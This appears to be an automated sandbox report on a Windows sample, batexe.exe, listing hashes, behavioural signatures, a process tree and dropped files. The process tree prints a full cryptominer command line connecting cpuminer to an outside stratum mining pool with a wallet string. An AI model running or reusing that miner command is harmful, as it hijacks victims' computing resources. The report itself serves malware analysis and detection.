Analysis
-
max time kernel
296s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
11/02/2024, 15:45
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4740 b2e.exe 3628 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3628 cpuminer-sse2.exe 3628 cpuminer-sse2.exe 3628 cpuminer-sse2.exe 3628 cpuminer-sse2.exe 3628 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1976-7-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1976 wrote to memory of 4740 1976 batexe.exe 85 PID 1976 wrote to memory of 4740 1976 batexe.exe 85 PID 1976 wrote to memory of 4740 1976 batexe.exe 85 PID 4740 wrote to memory of 4924 4740 b2e.exe 86 PID 4740 wrote to memory of 4924 4740 b2e.exe 86 PID 4740 wrote to memory of 4924 4740 b2e.exe 86 PID 4924 wrote to memory of 3628 4924 cmd.exe 89 PID 4924 wrote to memory of 3628 4924 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71C5.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3628
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36.6MB
MD5b443bef570bf7df923527c08e94cd7b8
SHA10eae66ce8848fcd78d9ddf7145ace9f410557549
SHA2566db741492d6768c352a594380b0aca933eba4e731598c86d5f06698a9553829c
SHA512bf614292d9a48cd10c5a502278923e03527da8eb28b473b172f6004f9eb0eedf1292b8186c28a4ee1dbd7ea8020c95ae4d93ac19ede4d7a81366c2278595971f
-
Filesize
3.1MB
MD596120993939f45494a2291ac005fc474
SHA1a3cbe6f79529aebfeeb7adf91dd6b9af72029334
SHA256238062b41bcb8369b3812623b0835fea1db60ed979c076477c0f9e4f50fbc838
SHA51204e8b936a4401d1f0fa77d89c125aac6d30e3d56142eb91ff8f4e89f12e5c5b27b619ba4c67996833ecb4571fdd4bef315279951a67b823f64c67ec71f121615
-
Filesize
1.9MB
MD5033a32e0272358cd590b05071af214b2
SHA1827a640a38909f747f59e8f2424e850d85dd7989
SHA25672ffab0933d1a19c411d302fe2064aa305c7d1776dd3b7d9f43e4faa7e9f70e0
SHA5120b93ced0cadeaa2c89ed8af42de8599765005886e2b9c073403fb845920cf63df24ed8def10afe301724a7bf4c52f7870ffe9c6f519ea37d9ded66cabb803261
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
748KB
MD52d686420f467f783910e92c34b9a07e0
SHA1d5d153ecc02a1b94a7509988560599532a584228
SHA256260b982ed31a618d2e974f14683966f3934de593cba6656035ef112d19d2b4a0
SHA512d0779525db068a04bdadd437b5e7c7d06b75407d400d726ce3c60d35777f1cdacc09b5c06a4cec6cf019d29c5f7dd5ce3e667a4c2fe96d7724b8f843a344ea3f
-
Filesize
977KB
MD560a5b75339dd505cf5cdad5b6aea2eb1
SHA13437991acf9b77b6babcc8f9880bc79b70c5dfa4
SHA256a21bd5ab21620906c6b311bf83d93e469eed67d716081e83e17338c140ba12e7
SHA51207b071022fff900efd25697c83374b7cd2b6c32092c058a31489b78849382dc7d9126c3279cc73e40d0f77c20554f7671c511c871e3bed96a25b4c2b0855ead8
-
Filesize
768KB
MD5e3f15c79f945604229fa814f57c79274
SHA119a7015dfbe622ab86c48693ee1605b26112a3fa
SHA2567b09ee53447ccf77a0f2d7bfe25908f963d681433d3cba5a16c7f45646c42175
SHA51212dc1df8a947caee13a12eca5a976feffd7408402b0495e4971d4bd7181e8d353ebc17da044d2ce6d1c273bb05a0ca5ddf7492394b355786d8b14b0997de162c
-
Filesize
789KB
MD5e683ab372c055c9c8604997d7ffd5db7
SHA11d47c72c06e2500128abe219ab2e5dc55ffdee11
SHA2560f328cb1a0d6cae81812b0e5409f9b41e3635323c347603f50d8fdad36fbb832
SHA51214200de0e900cb3ba85e85a1fe5ebc7b0f593ae76054ac3569af041d71ef098af977fca97f409fd58f1b08a5860132b646608c5554c20b588238072ef199e86a
-
Filesize
655KB
MD5ae59af5241316a448dbcf72355856127
SHA1eb8801d3430e27ed0e6e0cff4ea8d89c76643bbd
SHA256ae3552af06636898c7f639b42e55838415ebb9ddd9e4a966c74b701617bac9fc
SHA512d9a9c21c2b231c5817b9c7caff98cd7d662de65ab03a8587f21756a17a6cb47bf9f9dca310ca2999fc893b55192d850065bb7535c7545e89a94295693291dfa1
-
Filesize
478KB
MD5b5efe39b44c145e81939dfcfc87c9a7d
SHA14f637321ff23c601fc0c48ab4d2a12e37355b1fe
SHA256c2956b2888ab2d3a29aac6a5d6be2d869befd78522ea401dbc328d022ca4e427
SHA512873db49ff4e8deb93d79bfd48d3c141d3ed82d6953a802c0c2d77d135d562b748f12745075a2f9fcb74d32f3d3aaa5e632ffe206e961c03b9c8ec9738c3c5d6b
-
Filesize
768KB
MD5613807ad6d525aded318b643c33bc17e
SHA12c9a4180140838c69c20bc4047c3d2d777d3bee4
SHA256896775bd33edafb0d219d1ae3e973e71aa29a4937d0252bd3a4cad074c004971
SHA512d688b0f2570944898097dcc6acb56b3a4c901073f0ce22b5ea260b05a37fe2840d84b44e7aa74c7d73078b0e5a45c24994852f5c03f049982b6ddca6ead89539
-
Filesize
524KB
MD5a66b1fb36accd4d995088bf060cacc15
SHA118681314d2212000bc75e5fedef7c254eae3eede
SHA256688f40db0b2b4c6abc80e21dc1b4111a300927c9130a7d09946d325d1306a99f
SHA512c0d6fd55e4383feb1f0b4ed5f04e98604c7d656807efa9aac757c45da0c48475ad905ed87fb8f1afe2be7ee46d6c5448a41bde2b9bcf2bb13f5002780d71659d
-
Filesize
667KB
MD50f4c1aa30b782ec126533649f95194df
SHA15fef5d00e5f227edf7d123b8d474cede667ce453
SHA25636ce422310b95f9a7429676b3931238e968841a4bb755566f134ddfd3386a037
SHA512e55da8e485d46c08fc5967603b0b6d6c1c041c15f1d32c6cf681b6b5fa36be67300fdf69810722eaafeb8d0d108f8da94d98651437d5edcece9624b8e62c4ccd
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770